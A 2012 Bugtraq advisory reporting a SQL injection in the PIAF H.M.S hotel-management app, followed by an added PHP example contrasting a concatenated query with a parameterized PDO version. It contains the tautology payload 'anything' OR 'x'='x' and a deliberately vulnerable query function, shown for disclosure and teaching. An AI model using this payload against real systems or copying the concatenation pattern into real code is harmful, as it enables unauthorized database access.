Message-ID: <CAHKpqwbdsw94U2LX4a3FH64jT9iTU3n+C3E_d_W=gaTVmckOzA@mail.gmail.com>
Date: Sun, 28 Oct 2012 13:29:31 +0100
From: Michał Błaszczak <blaszczakm@...il.com>
To: bugtraq@...urityfocus.com
Subject: PIAF H.M.S - SQL Injection
# Exploit Title: PIAF H.M.S - SQL Injection
# Date: 28/10/2012
# Author: Michał Błaszczak
# Website: http://blaszczakm.blogspot.com
# Vendor Homepage: http://code.google.com/p/piafhms/
file: bills.php
line: 86-87
$query = $query . " ORDER BY ID DESC";
printf($query);
query:
SELECT * FROM `Users` WHERE `Room` = 'anything' OR 'x'='x' ORDER BY ID DESC
Michał Błaszczak
blaszczakm.blogspot.com
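
Added example, not part of the original post and not PIAF H.M.S code: the query pattern reported above next to a parameterized version, run against an in-memory SQLite database through PDO. The function names, the `Name` column, the sample rows and the line that builds the WHERE clause are assumptions; only `Users`, `Room`, `ID`, the ORDER BY line and the input string come from the advisory.

```php
<?php
// Constructed schema and rows for illustration. SQLite accepts the
// MySQL-style backtick identifiers used in the advisory's query.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE `Users` (`ID` INTEGER PRIMARY KEY, `Name` TEXT, `Room` TEXT)');
$pdo->exec("INSERT INTO `Users` (`Name`, `Room`) VALUES ('alice', '101'), ('bob', '102'), ('carol', '103')");

// Assumed shape of the code leading up to bills.php lines 86-87:
// request input is concatenated into the WHERE clause (hypothetical
// reconstruction; the advisory shows only the ORDER BY line).
function find_by_room_concat(PDO $pdo, string $room): array
{
    $query = "SELECT * FROM `Users` WHERE `Room` = '" . $room . "'";
    $query = $query . " ORDER BY ID DESC";
    return $pdo->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: the SQL text is a constant and the room value is bound
// as data, so quotes in the input cannot change the statement's structure.
function find_by_room_bound(PDO $pdo, string $room): array
{
    $stmt = $pdo->prepare('SELECT * FROM `Users` WHERE `Room` = :room ORDER BY `ID` DESC');
    $stmt->execute([':room' => $room]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The value that appears in the advisory's resulting query.
$input = "anything' OR 'x'='x";

// Row counts show the difference: the concatenated query matches every
// row in the table, the bound query matches only rows whose Room equals
// the literal input string.
printf("concatenated:   %d rows\n", count(find_by_room_concat($pdo, $input)));
printf("bound:          %d rows\n", count(find_by_room_bound($pdo, $input)));
printf("bound, '101':   %d rows\n", count(find_by_room_bound($pdo, '101')));
```

The bound version also never echoes the statement, unlike the `printf($query)` on line 87, which writes the assembled SQL into the response.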